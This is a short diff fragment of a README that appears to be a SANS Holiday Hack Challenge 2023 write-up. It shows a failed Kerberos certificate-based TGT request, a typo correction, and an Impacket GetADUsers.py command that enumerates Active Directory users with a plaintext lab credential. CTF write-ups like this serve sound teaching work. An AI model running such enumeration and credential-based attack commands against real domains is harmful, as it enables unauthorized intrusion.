Miragle-Hub/Holiday-Hack-Challenge-2023---SANS/README.md

 [*] Trying to get TGT...
 [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
 ````
-Could not get anything for alabaster let's search if we can find any other used for whom we can request a certificate.
+Could not get anything for alabaster let's search if we can find any other user for whom we can request a certificate.
 ````
 alabaster@ssh-server-vm:~/impacket$ GetADUsers.py -all -dc-ip 10.0.0.53 'northpole.local/elfy:J4`ufC49/J4766'
 Impacket v0.11.0 - Copyright 2023 Fortra